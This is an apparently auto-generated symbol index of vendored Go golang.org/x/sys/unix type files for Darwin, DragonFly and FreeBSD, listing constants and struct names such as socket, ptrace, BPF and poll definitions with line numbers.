SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 422) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 423) | SizeofCmsghdr = 0xc constant SizeofInet4Pktinfo (line 424) | SizeofInet4Pktinfo = 0xc constant SizeofInet6Pktinfo (line 425) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 426) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 427) | SizeofICMPv6Filter = 0x20 constant SizeofTCPConnectionInfo (line 428) | SizeofTCPConnectionInfo = 0x70 constant PTRACE_TRACEME (line 432) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 433) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 434) | PTRACE_KILL = 0x8 type Kevent_t (line 437) | type Kevent_t struct type FdSet (line 446) | type FdSet struct constant SizeofIfMsghdr (line 451) | SizeofIfMsghdr = 0x70 constant SizeofIfData (line 452) | SizeofIfData = 0x60 constant SizeofIfaMsghdr (line 453) | SizeofIfaMsghdr = 0x14 constant SizeofIfmaMsghdr (line 454) | SizeofIfmaMsghdr = 0x10 constant SizeofIfmaMsghdr2 (line 455) | SizeofIfmaMsghdr2 = 0x14 constant SizeofRtMsghdr (line 456) | SizeofRtMsghdr = 0x5c constant SizeofRtMetrics (line 457) | SizeofRtMetrics = 0x38 type IfMsghdr (line 460) | type IfMsghdr struct type IfData (line 470) | type IfData struct type IfaMsghdr (line 502) | type IfaMsghdr struct type IfmaMsghdr (line 512) | type IfmaMsghdr struct type IfmaMsghdr2 (line 522) | type IfmaMsghdr2 struct type RtMsghdr (line 532) | type RtMsghdr struct type RtMetrics (line 547) | type RtMetrics struct constant SizeofBpfVersion (line 563) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 564) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 565) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 566) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 567) | SizeofBpfHdr = 0x14 type BpfVersion (line 570) | type BpfVersion struct type BpfStat (line 575) | type BpfStat struct type BpfProgram (line 580) | type BpfProgram struct type BpfInsn (line 585) | type BpfInsn struct type BpfHdr (line 592) | type BpfHdr struct type Termios (line 600) | type Termios struct type Winsize (line 610) | type Winsize struct constant AT_FDCWD (line 618) | AT_FDCWD = -0x2 constant AT_REMOVEDIR (line 619) | AT_REMOVEDIR = 0x80 constant AT_SYMLINK_FOLLOW (line 620) | AT_SYMLINK_FOLLOW = 0x40 constant AT_SYMLINK_NOFOLLOW (line 621) | AT_SYMLINK_NOFOLLOW = 0x20 constant AT_EACCESS (line 622) | AT_EACCESS = 0x10 type PollFd (line 625) | type PollFd struct constant POLLERR (line 632) | POLLERR = 0x8 constant POLLHUP (line 633) | POLLHUP = 0x10 constant POLLIN (line 634) | POLLIN = 0x1 constant POLLNVAL (line 635) | POLLNVAL = 0x20 constant POLLOUT (line 636) | POLLOUT = 0x4 constant POLLPRI (line 637) | POLLPRI = 0x2 constant POLLRDBAND (line 638) | POLLRDBAND = 0x80 constant POLLRDNORM (line 639) | POLLRDNORM = 0x40 constant POLLWRBAND (line 640) | POLLWRBAND = 0x100 constant POLLWRNORM (line 641) | POLLWRNORM = 0x4 type Utsname (line 644) | type Utsname struct constant SizeofClockinfo (line 652) | SizeofClockinfo = 0x14 type Clockinfo (line 654) | type Clockinfo struct type CtlInfo (line 662) | type CtlInfo struct constant SizeofKinfoProc (line 667) | SizeofKinfoProc = 0x288 type Eproc (line 669) | type Eproc struct type ExternProc (line 692) | type ExternProc struct type Itimerval (line 736) | type Itimerval struct type KinfoProc (line 741) | type KinfoProc struct type Vmspace (line 746) | type Vmspace struct type Pcred (line 753) | type Pcred struct type Ucred (line 764) | type Ucred struct type SysvIpcPerm (line 771) | type SysvIpcPerm struct type SysvShmDesc (line 780) | type SysvShmDesc struct constant IPC_CREAT (line 790) | IPC_CREAT = 0x200 constant IPC_EXCL (line 791) | IPC_EXCL = 0x400 constant IPC_NOWAIT (line 792) | IPC_NOWAIT = 0x800 constant IPC_PRIVATE (line 793) | IPC_PRIVATE = 0x0 constant IPC_RMID (line 797) | IPC_RMID = 0x0 constant IPC_SET (line 798) | IPC_SET = 0x1 constant IPC_STAT (line 799) | IPC_STAT = 0x2 constant SHM_RDONLY (line 803) | SHM_RDONLY = 0x1000 constant SHM_RND (line 804) | SHM_RND = 0x2000 FILE: vendor/golang.org/x/sys/unix/ztypes_dragonfly_amd64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 33) | type Rusage struct type Rlimit (line 52) | type Rlimit struct type _Gid_t (line 57) | type _Gid_t type Stat_t (line 59) | type Stat_t struct type Statfs_t (line 81) | type Statfs_t struct type Flock_t (line 106) | type Flock_t struct type Dirent (line 114) | type Dirent struct type Fsid (line 123) | type Fsid struct constant PathMax (line 128) | PathMax = 0x400 type RawSockaddrInet4 (line 131) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 139) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 148) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 154) | type RawSockaddrDatalink struct type RawSockaddr (line 167) | type RawSockaddr struct type RawSockaddrAny (line 173) | type RawSockaddrAny struct type _Socklen (line 178) | type _Socklen type Linger (line 180) | type Linger struct type Iovec (line 185) | type Iovec struct type IPMreq (line 190) | type IPMreq struct type IPv6Mreq (line 195) | type IPv6Mreq struct type Msghdr (line 200) | type Msghdr struct type Cmsghdr (line 210) | type Cmsghdr struct type Inet6Pktinfo (line 216) | type Inet6Pktinfo struct type IPv6MTUInfo (line 221) | type IPv6MTUInfo struct type ICMPv6Filter (line 226) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 231) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 232) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 233) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 234) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 235) | SizeofSockaddrDatalink = 0x36 constant SizeofLinger (line 236) | SizeofLinger = 0x8 constant SizeofIovec (line 237) | SizeofIovec = 0x10 constant SizeofIPMreq (line 238) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 239) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 240) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 241) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 242) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 243) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 244) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 248) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 249) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 250) | PTRACE_KILL = 0x8 type Kevent_t (line 253) | type Kevent_t struct type FdSet (line 262) | type FdSet struct constant SizeofIfMsghdr (line 267) | SizeofIfMsghdr = 0xb0 constant SizeofIfData (line 268) | SizeofIfData = 0xa0 constant SizeofIfaMsghdr (line 269) | SizeofIfaMsghdr = 0x18 constant SizeofIfmaMsghdr (line 270) | SizeofIfmaMsghdr = 0x10 constant SizeofIfAnnounceMsghdr (line 271) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 272) | SizeofRtMsghdr = 0x98 constant SizeofRtMetrics (line 273) | SizeofRtMetrics = 0x70 type IfMsghdr (line 276) | type IfMsghdr struct type IfData (line 286) | type IfData struct type IfaMsghdr (line 313) | type IfaMsghdr struct type IfmaMsghdr (line 324) | type IfmaMsghdr struct type IfAnnounceMsghdr (line 333) | type IfAnnounceMsghdr struct type RtMsghdr (line 342) | type RtMsghdr struct type RtMetrics (line 357) | type RtMetrics struct constant SizeofBpfVersion (line 376) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 377) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 378) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 379) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 380) | SizeofBpfHdr = 0x20 type BpfVersion (line 383) | type BpfVersion struct type BpfStat (line 388) | type BpfStat struct type BpfProgram (line 393) | type BpfProgram struct type BpfInsn (line 398) | type BpfInsn struct type BpfHdr (line 405) | type BpfHdr struct type Termios (line 413) | type Termios struct type Winsize (line 423) | type Winsize struct constant AT_FDCWD (line 431) | AT_FDCWD = 0xfffafdcd constant AT_SYMLINK_NOFOLLOW (line 432) | AT_SYMLINK_NOFOLLOW = 0x1 constant AT_REMOVEDIR (line 433) | AT_REMOVEDIR = 0x2 constant AT_EACCESS (line 434) | AT_EACCESS = 0x4 constant AT_SYMLINK_FOLLOW (line 435) | AT_SYMLINK_FOLLOW = 0x8 type PollFd (line 438) | type PollFd struct constant POLLERR (line 445) | POLLERR = 0x8 constant POLLHUP (line 446) | POLLHUP = 0x10 constant POLLIN (line 447) | POLLIN = 0x1 constant POLLNVAL (line 448) | POLLNVAL = 0x20 constant POLLOUT (line 449) | POLLOUT = 0x4 constant POLLPRI (line 450) | POLLPRI = 0x2 constant POLLRDBAND (line 451) | POLLRDBAND = 0x80 constant POLLRDNORM (line 452) | POLLRDNORM = 0x40 constant POLLWRBAND (line 453) | POLLWRBAND = 0x100 constant POLLWRNORM (line 454) | POLLWRNORM = 0x4 type Utsname (line 457) | type Utsname struct constant SizeofClockinfo (line 465) | SizeofClockinfo = 0x14 type Clockinfo (line 467) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_freebsd_386.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x4 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Time_t (line 33) | type Time_t type Rusage (line 35) | type Rusage struct type Rlimit (line 54) | type Rlimit struct type _Gid_t (line 59) | type _Gid_t constant _statfsVersion (line 62) | _statfsVersion = 0x20140518 constant _dirblksiz (line 63) | _dirblksiz = 0x400 type Stat_t (line 66) | type Stat_t struct type Statfs_t (line 92) | type Statfs_t struct type Flock_t (line 117) | type Flock_t struct type Dirent (line 126) | type Dirent struct type Fsid (line 137) | type Fsid struct constant PathMax (line 142) | PathMax = 0x400 constant FADV_NORMAL (line 146) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 147) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 148) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 149) | FADV_WILLNEED = 0x3 constant FADV_DONTNEED (line 150) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 151) | FADV_NOREUSE = 0x5 type RawSockaddrInet4 (line 154) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 162) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 171) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 177) | type RawSockaddrDatalink struct type RawSockaddr (line 188) | type RawSockaddr struct type RawSockaddrAny (line 194) | type RawSockaddrAny struct type _Socklen (line 199) | type _Socklen type Xucred (line 201) | type Xucred struct type Linger (line 209) | type Linger struct type Iovec (line 214) | type Iovec struct type IPMreq (line 219) | type IPMreq struct type IPMreqn (line 224) | type IPMreqn struct type IPv6Mreq (line 230) | type IPv6Mreq struct type Msghdr (line 235) | type Msghdr struct type Cmsghdr (line 245) | type Cmsghdr struct type Inet6Pktinfo (line 251) | type Inet6Pktinfo struct type IPv6MTUInfo (line 256) | type IPv6MTUInfo struct type ICMPv6Filter (line 261) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 266) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 267) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 268) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 269) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 270) | SizeofSockaddrDatalink = 0x36 constant SizeofXucred (line 271) | SizeofXucred = 0x50 constant SizeofLinger (line 272) | SizeofLinger = 0x8 constant SizeofIovec (line 273) | SizeofIovec = 0x8 constant SizeofIPMreq (line 274) | SizeofIPMreq = 0x8 constant SizeofIPMreqn (line 275) | SizeofIPMreqn = 0xc constant SizeofIPv6Mreq (line 276) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 277) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 278) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 279) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 280) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 281) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 285) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 286) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 287) | PTRACE_KILL = 0x8 type PtraceLwpInfoStruct (line 290) | type PtraceLwpInfoStruct struct type __Siginfo (line 303) | type __Siginfo struct type __PtraceSiginfo (line 314) | type __PtraceSiginfo struct type Sigset_t (line 326) | type Sigset_t struct type Reg (line 330) | type Reg struct type FpReg (line 352) | type FpReg struct type FpExtendedPrecision (line 359) | type FpExtendedPrecision struct type PtraceIoDesc (line 361) | type PtraceIoDesc struct type Kevent_t (line 368) | type Kevent_t struct type FdSet (line 378) | type FdSet struct constant sizeofIfMsghdr (line 383) | sizeofIfMsghdr = 0xa8 constant SizeofIfMsghdr (line 384) | SizeofIfMsghdr = 0x60 constant sizeofIfData (line 385) | sizeofIfData = 0x98 constant SizeofIfData (line 386) | SizeofIfData = 0x50 constant SizeofIfaMsghdr (line 387) | SizeofIfaMsghdr = 0x14 constant SizeofIfmaMsghdr (line 388) | SizeofIfmaMsghdr = 0x10 constant SizeofIfAnnounceMsghdr (line 389) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 390) | SizeofRtMsghdr = 0x5c constant SizeofRtMetrics (line 391) | SizeofRtMetrics = 0x38 type ifMsghdr (line 394) | type ifMsghdr struct type IfMsghdr (line 405) | type IfMsghdr struct type ifData (line 415) | type ifData struct type IfData (line 443) | type IfData struct type IfaMsghdr (line 471) | type IfaMsghdr struct type IfmaMsghdr (line 482) | type IfmaMsghdr struct type IfAnnounceMsghdr (line 492) | type IfAnnounceMsghdr struct type RtMsghdr (line 501) | type RtMsghdr struct type RtMetrics (line 517) | type RtMetrics struct constant SizeofBpfVersion (line 533) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 534) | SizeofBpfStat = 0x8 constant SizeofBpfZbuf (line 535) | SizeofBpfZbuf = 0xc constant SizeofBpfProgram (line 536) | SizeofBpfProgram = 0x8 constant SizeofBpfInsn (line 537) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 538) | SizeofBpfHdr = 0x14 constant SizeofBpfZbufHeader (line 539) | SizeofBpfZbufHeader = 0x20 type BpfVersion (line 542) | type BpfVersion struct type BpfStat (line 547) | type BpfStat struct type BpfZbuf (line 552) | type BpfZbuf struct type BpfProgram (line 558) | type BpfProgram struct type BpfInsn (line 563) | type BpfInsn struct type BpfHdr (line 570) | type BpfHdr struct type BpfZbufHeader (line 578) | type BpfZbufHeader struct type Termios (line 585) | type Termios struct type Winsize (line 595) | type Winsize struct constant AT_FDCWD (line 603) | AT_FDCWD = -0x64 constant AT_EACCESS (line 604) | AT_EACCESS = 0x100 constant AT_SYMLINK_NOFOLLOW (line 605) | AT_SYMLINK_NOFOLLOW = 0x200 constant AT_SYMLINK_FOLLOW (line 606) | AT_SYMLINK_FOLLOW = 0x400 constant AT_REMOVEDIR (line 607) | AT_REMOVEDIR = 0x800 type PollFd (line 610) | type PollFd struct constant POLLERR (line 617) | POLLERR = 0x8 constant POLLHUP (line 618) | POLLHUP = 0x10 constant POLLIN (line 619) | POLLIN = 0x1 constant POLLINIGNEOF (line 620) | POLLINIGNEOF = 0x2000 constant POLLNVAL (line 621) | POLLNVAL = 0x20 constant POLLOUT (line 622) | POLLOUT = 0x4 constant POLLPRI (line 623) | POLLPRI = 0x2 constant POLLRDBAND (line 624) | POLLRDBAND = 0x80 constant POLLRDNORM (line 625) | POLLRDNORM = 0x40 constant POLLWRBAND (line 626) | POLLWRBAND = 0x100 constant POLLWRNORM (line 627) | POLLWRNORM = 0x4 type CapRights (line 630) | type CapRights struct type Utsname (line 634) | type Utsname struct constant SizeofClockinfo (line 642) | SizeofClockinfo = 0x14 type Clockinfo (line 644) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_freebsd_amd64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Time_t (line 33) | type Time_t type Rusage (line 35) | type Rusage struct type Rlimit (line 54) | type Rlimit struct type _Gid_t (line 59) | type _Gid_t constant _statfsVersion (line 62) | _statfsVersion = 0x20140518 constant _dirblksiz (line 63) | _dirblksiz = 0x400 type Stat_t (line 66) | type Stat_t struct type Statfs_t (line 88) | type Statfs_t struct type Flock_t (line 113) | type Flock_t struct type Dirent (line 123) | type Dirent struct type Fsid (line 134) | type Fsid struct constant PathMax (line 139) | PathMax = 0x400 constant FADV_NORMAL (line 143) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 144) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 145) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 146) | FADV_WILLNEED = 0x3 constant FADV_DONTNEED (line 147) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 148) | FADV_NOREUSE = 0x5 type RawSockaddrInet4 (line 151) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 159) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 168) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 174) | type RawSockaddrDatalink struct type RawSockaddr (line 185) | type RawSockaddr struct type RawSockaddrAny (line 191) | type RawSockaddrAny struct type _Socklen (line 196) | type _Socklen type Xucred (line 198) | type Xucred struct type Linger (line 206) | type Linger struct type Iovec (line 211) | type Iovec struct type IPMreq (line 216) | type IPMreq struct type IPMreqn (line 221) | type IPMreqn struct type IPv6Mreq (line 227) | type IPv6Mreq struct type Msghdr (line 232) | type Msghdr struct type Cmsghdr (line 242) | type Cmsghdr struct type Inet6Pktinfo (line 248) | type Inet6Pktinfo struct type IPv6MTUInfo (line 253) | type IPv6MTUInfo struct type ICMPv6Filter (line 258) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 263) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 264) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 265) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 266) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 267) | SizeofSockaddrDatalink = 0x36 constant SizeofXucred (line 268) | SizeofXucred = 0x58 constant SizeofLinger (line 269) | SizeofLinger = 0x8 constant SizeofIovec (line 270) | SizeofIovec = 0x10 constant SizeofIPMreq (line 271) | SizeofIPMreq = 0x8 constant SizeofIPMreqn (line 272) | SizeofIPMreqn = 0xc constant SizeofIPv6Mreq (line 273) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 274) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 275) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 276) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 277) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 278) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 282) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 283) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 284) | PTRACE_KILL = 0x8 type PtraceLwpInfoStruct (line 287) | type PtraceLwpInfoStruct struct type __Siginfo (line 300) | type __Siginfo struct type __PtraceSiginfo (line 312) | type __PtraceSiginfo struct type Sigset_t (line 324) | type Sigset_t struct type Reg (line 328) | type Reg struct type FpReg (line 357) | type FpReg struct type FpExtendedPrecision (line 364) | type FpExtendedPrecision struct type PtraceIoDesc (line 366) | type PtraceIoDesc struct type Kevent_t (line 373) | type Kevent_t struct type FdSet (line 383) | type FdSet struct constant sizeofIfMsghdr (line 388) | sizeofIfMsghdr = 0xa8 constant SizeofIfMsghdr (line 389) | SizeofIfMsghdr = 0xa8 constant sizeofIfData (line 390) | sizeofIfData = 0x98 constant SizeofIfData (line 391) | SizeofIfData = 0x98 constant SizeofIfaMsghdr (line 392) | SizeofIfaMsghdr = 0x14 constant SizeofIfmaMsghdr (line 393) | SizeofIfmaMsghdr = 0x10 constant SizeofIfAnnounceMsghdr (line 394) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 395) | SizeofRtMsghdr = 0x98 constant SizeofRtMetrics (line 396) | SizeofRtMetrics = 0x70 type ifMsghdr (line 399) | type ifMsghdr struct type IfMsghdr (line 410) | type IfMsghdr struct type ifData (line 420) | type ifData struct type IfData (line 448) | type IfData struct type IfaMsghdr (line 476) | type IfaMsghdr struct type IfmaMsghdr (line 487) | type IfmaMsghdr struct type IfAnnounceMsghdr (line 497) | type IfAnnounceMsghdr struct type RtMsghdr (line 506) | type RtMsghdr struct type RtMetrics (line 522) | type RtMetrics struct constant SizeofBpfVersion (line 538) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 539) | SizeofBpfStat = 0x8 constant SizeofBpfZbuf (line 540) | SizeofBpfZbuf = 0x18 constant SizeofBpfProgram (line 541) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 542) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 543) | SizeofBpfHdr = 0x20 constant SizeofBpfZbufHeader (line 544) | SizeofBpfZbufHeader = 0x20 type BpfVersion (line 547) | type BpfVersion struct type BpfStat (line 552) | type BpfStat struct type BpfZbuf (line 557) | type BpfZbuf struct type BpfProgram (line 563) | type BpfProgram struct type BpfInsn (line 568) | type BpfInsn struct type BpfHdr (line 575) | type BpfHdr struct type BpfZbufHeader (line 583) | type BpfZbufHeader struct type Termios (line 590) | type Termios struct type Winsize (line 600) | type Winsize struct constant AT_FDCWD (line 608) | AT_FDCWD = -0x64 constant AT_EACCESS (line 609) | AT_EACCESS = 0x100 constant AT_SYMLINK_NOFOLLOW (line 610) | AT_SYMLINK_NOFOLLOW = 0x200 constant AT_SYMLINK_FOLLOW (line 611) | AT_SYMLINK_FOLLOW = 0x400 constant AT_REMOVEDIR (line 612) | AT_REMOVEDIR = 0x800 type PollFd (line 615) | type PollFd struct constant POLLERR (line 622) | POLLERR = 0x8 constant POLLHUP (line 623) | POLLHUP = 0x10 constant POLLIN (line 624) | POLLIN = 0x1 constant POLLINIGNEOF (line 625) | POLLINIGNEOF = 0x2000 constant POLLNVAL (line 626) | POLLNVAL = 0x20 constant POLLOUT (line 627) | POLLOUT = 0x4 constant POLLPRI (line 628) | POLLPRI = 0x2 constant POLLRDBAND (line 629) | POLLRDBAND = 0x80 constant POLLRDNORM (line 630) | POLLRDNORM = 0x40 constant POLLWRBAND (line 631) | POLLWRBAND = 0x100 constant POLLWRNORM (line 632) | POLLWRNORM = 0x4 type CapRights (line 635) | type CapRights struct type Utsname (line 639) | type Utsname struct constant SizeofClockinfo (line 647) | SizeofClockinfo = 0x14 type Clockinfo (line 649) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_freebsd_arm.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x4 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 29) | type Timeval struct type Time_t (line 35) | type Time_t type Rusage (line 37) | type Rusage struct type Rlimit (line 56) | type Rlimit struct type _Gid_t (line 61) | type _Gid_t constant _statfsVersion (line 64) | _statfsVersion = 0x20140518 constant _dirblksiz (line 65) | _dirblksiz = 0x400 type Stat_t (line 68) | type Stat_t struct type Statfs_t (line 90) | type Statfs_t struct type Flock_t (line 115) | type Flock_t struct type Dirent (line 125) | type Dirent struct type Fsid (line 136) | type Fsid struct constant PathMax (line 141) | PathMax = 0x400 constant FADV_NORMAL (line 145) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 146) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 147) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 148) | FADV_WILLNEED = 0x3 constant FADV_DONTNEED (line 149) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 150) | FADV_NOREUSE = 0x5 type RawSockaddrInet4 (line 153) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 161) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 170) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 176) | type RawSockaddrDatalink struct type RawSockaddr (line 187) | type RawSockaddr struct type RawSockaddrAny (line 193) | type RawSockaddrAny struct type _Socklen (line 198) | type _Socklen type Xucred (line 200) | type Xucred struct type Linger (line 208) | type Linger struct type Iovec (line 213) | type Iovec struct type IPMreq (line 218) | type IPMreq struct type IPMreqn (line 223) | type IPMreqn struct type IPv6Mreq (line 229) | type IPv6Mreq struct type Msghdr (line 234) | type Msghdr struct type Cmsghdr (line 244) | type Cmsghdr struct type Inet6Pktinfo (line 250) | type Inet6Pktinfo struct type IPv6MTUInfo (line 255) | type IPv6MTUInfo struct type ICMPv6Filter (line 260) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 265) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 266) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 267) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 268) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 269) | SizeofSockaddrDatalink = 0x36 constant SizeofXucred (line 270) | SizeofXucred = 0x50 constant SizeofLinger (line 271) | SizeofLinger = 0x8 constant SizeofIovec (line 272) | SizeofIovec = 0x8 constant SizeofIPMreq (line 273) | SizeofIPMreq = 0x8 constant SizeofIPMreqn (line 274) | SizeofIPMreqn = 0xc constant SizeofIPv6Mreq (line 275) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 276) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 277) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 278) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 279) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 280) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 284) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 285) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 286) | PTRACE_KILL = 0x8 type PtraceLwpInfoStruct (line 289) | type PtraceLwpInfoStruct struct type __Siginfo (line 302) | type __Siginfo struct type __PtraceSiginfo (line 314) | type __PtraceSiginfo struct type Sigset_t (line 326) | type Sigset_t struct type Reg (line 330) | type Reg struct type FpReg (line 338) | type FpReg struct type FpExtendedPrecision (line 343) | type FpExtendedPrecision struct type PtraceIoDesc (line 349) | type PtraceIoDesc struct type Kevent_t (line 356) | type Kevent_t struct type FdSet (line 368) | type FdSet struct constant sizeofIfMsghdr (line 373) | sizeofIfMsghdr = 0xa8 constant SizeofIfMsghdr (line 374) | SizeofIfMsghdr = 0x70 constant sizeofIfData (line 375) | sizeofIfData = 0x98 constant SizeofIfData (line 376) | SizeofIfData = 0x60 constant SizeofIfaMsghdr (line 377) | SizeofIfaMsghdr = 0x14 constant SizeofIfmaMsghdr (line 378) | SizeofIfmaMsghdr = 0x10 constant SizeofIfAnnounceMsghdr (line 379) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 380) | SizeofRtMsghdr = 0x5c constant SizeofRtMetrics (line 381) | SizeofRtMetrics = 0x38 type ifMsghdr (line 384) | type ifMsghdr struct type IfMsghdr (line 395) | type IfMsghdr struct type ifData (line 405) | type ifData struct type IfData (line 433) | type IfData struct type IfaMsghdr (line 462) | type IfaMsghdr struct type IfmaMsghdr (line 473) | type IfmaMsghdr struct type IfAnnounceMsghdr (line 483) | type IfAnnounceMsghdr struct type RtMsghdr (line 492) | type RtMsghdr struct type 